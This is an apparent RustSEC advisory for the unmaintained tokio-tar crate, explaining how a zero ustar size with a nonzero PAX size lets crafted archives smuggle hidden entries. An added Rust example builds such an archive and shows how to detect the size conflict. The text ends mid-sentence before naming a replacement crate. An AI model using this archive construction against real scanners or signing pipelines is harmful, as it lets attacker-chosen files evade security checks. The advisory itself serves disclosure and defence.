advisory-db/crates/tokio-tar/RUSTSEC-2025-0111.md
```toml
[advisory]
id = "RUSTSEC-2025-0111"
package = "tokio-tar"
date = "2025-10-21"
url = "https://edera.dev/stories/tarmageddon"
categories = ["format-injection"]
keywords = ["unsound", "parsing", "smuggling", "file-smuggling", "unmaintained"]
related = ["CVE-2025-62518", "GHSA-j5gw-2vrg-8fgx"]

[affected.functions]
"tokio_tar::Archive::new" = ["<= 0.3.1"]
"tokio_tar::ArchiveBuilder::new" = ["<= 0.3.1"]

[versions]
patched = []
```

# tokio-tar parses PAX extended headers incorrectly, allows file smuggling

The archive reader handles PAX extended headers incorrectly. When an entry's ustar header specifies a size of zero (`size=000000000000`) but the preceding PAX extended header specifies a non-zero `size` record, `tokio_tar::Archive` trusts the ustar field instead of the PAX override, advances zero bytes, and parses the entry's actual content as the next tar entry header.

A crafted tar file can therefore present different content to tokio-tar than to other tar implementations that honour the PAX size: the entry content seen by a conforming reader is interpreted by tokio-tar as additional, attacker-chosen entries (file smuggling), so any policy applied by a different tool (scanning, signing, path filtering) does not cover what tokio-tar extracts.
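To make the divergence concrete, here is an added example (not code from tokio-tar or from the advisory) that builds a tar archive whose ustar `size` field says 0 while its PAX header says 1024, then parses it twice: once honouring the PAX size (correct) and once trusting the ustar field (the vulnerable behaviour described above). It uses only the standard library; the entry names `legit.txt` / `smuggled.txt`, the `PaxHeaders/` naming, and the byte contents are constructed here for illustration. The parser also reports entries whose ustar and PAX sizes disagree, which is the condition a scanner would flag before handing an archive to an affected tokio-tar version.

```rust
// Added example, not part of tokio-tar or the advisory. Constructed archive
// and names (legit.txt, smuggled.txt) are illustrative. std only.

const BLOCK: usize = 512;

fn round_up(n: usize) -> usize {
    (n + BLOCK - 1) / BLOCK * BLOCK
}

/// Write `value` as a zero-padded octal string with a trailing NUL.
fn put_octal(field: &mut [u8], value: u64) {
    let digits = field.len() - 1;
    let s = format!("{:0width$o}", value, width = digits);
    field[..digits].copy_from_slice(s.as_bytes());
    field[digits] = 0;
}

/// Build a well-formed POSIX ustar header block with a valid checksum.
fn ustar_header(name: &str, size: u64, typeflag: u8) -> [u8; BLOCK] {
    let mut h = [0u8; BLOCK];
    h[..name.len()].copy_from_slice(name.as_bytes());
    put_octal(&mut h[100..108], 0o644); // mode
    put_octal(&mut h[108..116], 0); // uid
    put_octal(&mut h[116..124], 0); // gid
    put_octal(&mut h[124..136], size); // size: the field the vulnerable reader trusts
    put_octal(&mut h[136..148], 0); // mtime
    h[148..156].copy_from_slice(b"        "); // checksum is computed over 8 spaces
    h[156] = typeflag;
    h[257..263].copy_from_slice(b"ustar\0");
    h[263..265].copy_from_slice(b"00");
    let sum: u32 = h.iter().map(|&b| b as u32).sum();
    h[148..156].copy_from_slice(format!("{:06o}\0 ", sum).as_bytes());
    h
}

/// Encode one PAX record "<len> key=value\n", where len counts the whole record.
fn pax_record(key: &str, value: &str) -> Vec<u8> {
    let body = format!(" {}={}\n", key, value);
    let mut len = body.len() + 1;
    while len.to_string().len() + body.len() != len {
        len += 1;
    }
    format!("{}{}", len, body).into_bytes()
}

/// Constructed archive: PAX header (size=1024), then "legit.txt" whose ustar
/// size says 0, then 1024 bytes of content whose first block is itself a
/// well-formed ustar header for "smuggled.txt".
fn build_smuggling_archive() -> Vec<u8> {
    let mut out = Vec::new();
    let rec = pax_record("size", "1024");
    out.extend_from_slice(&ustar_header("PaxHeaders/legit.txt", rec.len() as u64, b'x'));
    let mut rec_block = rec.clone();
    rec_block.resize(round_up(rec.len()), 0);
    out.extend_from_slice(&rec_block);
    out.extend_from_slice(&ustar_header("legit.txt", 0, b'0'));
    let mut content = ustar_header("smuggled.txt", 7, b'0').to_vec();
    let mut payload = b"SMUGGLE".to_vec();
    payload.resize(BLOCK, 0);
    content.extend_from_slice(&payload);
    out.extend_from_slice(&content);
    out.extend_from_slice(&[0u8; 2 * BLOCK]); // end-of-archive marker
    out
}

fn field_str(h: &[u8]) -> String {
    let end = h.iter().position(|&b| b == 0).unwrap_or(h.len());
    String::from_utf8_lossy(&h[..end]).into_owned()
}

fn field_octal(h: &[u8]) -> u64 {
    u64::from_str_radix(field_str(h).trim(), 8).unwrap_or(0)
}

fn checksum_ok(h: &[u8]) -> bool {
    let stored = field_octal(&h[148..156]);
    let sum: u64 = h.iter().enumerate()
        .map(|(i, &b)| if (148..156).contains(&i) { b' ' as u64 } else { b as u64 })
        .sum();
    stored == sum
}

/// Parse an archive. `honor_pax` selects the correct behaviour (PAX size
/// overrides ustar size) versus the vulnerable one (ustar size wins).
/// Returns (entries as (name, data), names whose ustar and PAX sizes disagree).
fn read_archive(archive: &[u8], honor_pax: bool) -> (Vec<(String, Vec<u8>)>, Vec<String>) {
    let mut entries = Vec::new();
    let mut conflicts = Vec::new();
    let mut pax_size: Option<u64> = None;
    let mut pos = 0;
    while pos + BLOCK <= archive.len() {
        let h = &archive[pos..pos + BLOCK];
        if h.iter().all(|&b| b == 0) || !checksum_ok(h) {
            break;
        }
        pos += BLOCK;
        let name = field_str(&h[..100]);
        let ustar_size = field_octal(&h[124..136]);
        if h[156] == b'x' {
            let end = (pos + ustar_size as usize).min(archive.len());
            for line in String::from_utf8_lossy(&archive[pos..end]).lines() {
                if let Some(v) = line.split_once(' ').and_then(|(_, kv)| kv.strip_prefix("size=")) {
                    pax_size = v.parse().ok();
                }
            }
            pos += round_up(ustar_size as usize);
            continue;
        }
        let pax = pax_size.take();
        if let Some(p) = pax {
            if p != ustar_size {
                conflicts.push(name.clone());
            }
        }
        let size = match (honor_pax, pax) { (true, Some(p)) => p, _ => ustar_size };
        let end = (pos + size as usize).min(archive.len());
        entries.push((name, archive[pos..end].to_vec()));
        pos += round_up(size as usize);
    }
    (entries, conflicts)
}

fn main() {
    let archive = build_smuggling_archive();
    for &honor in &[true, false] {
        let (entries, conflicts) = read_archive(&archive, honor);
        let summary: Vec<(&str, usize)> = entries.iter().map(|(n, d)| (n.as_str(), d.len())).collect();
        println!("honor_pax={}: entries={:?} size_conflicts={:?}", honor, summary, conflicts);
    }
}
```

With `honor_pax = true` the archive holds a single entry, `legit.txt`, with 1024 bytes of opaque data; with `honor_pax = false` (the vulnerable behaviour) the same bytes yield two entries, an empty `legit.txt` and a `smuggled.txt` containing `SMUGGLE`. Either way `read_archive` reports `legit.txt` as a size conflict, which is the cheap pre-check to apply to untrusted archives.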

This is the same bug tracked as CVE-2025-62518 and GHSA-j5gw-2vrg-8fgx in a related crate, as those crates share a common ancestor codebase.

The tokio-tar crate is archived and no longer maintained, so no patched version exists; we recommend switching to an alternative crate such as: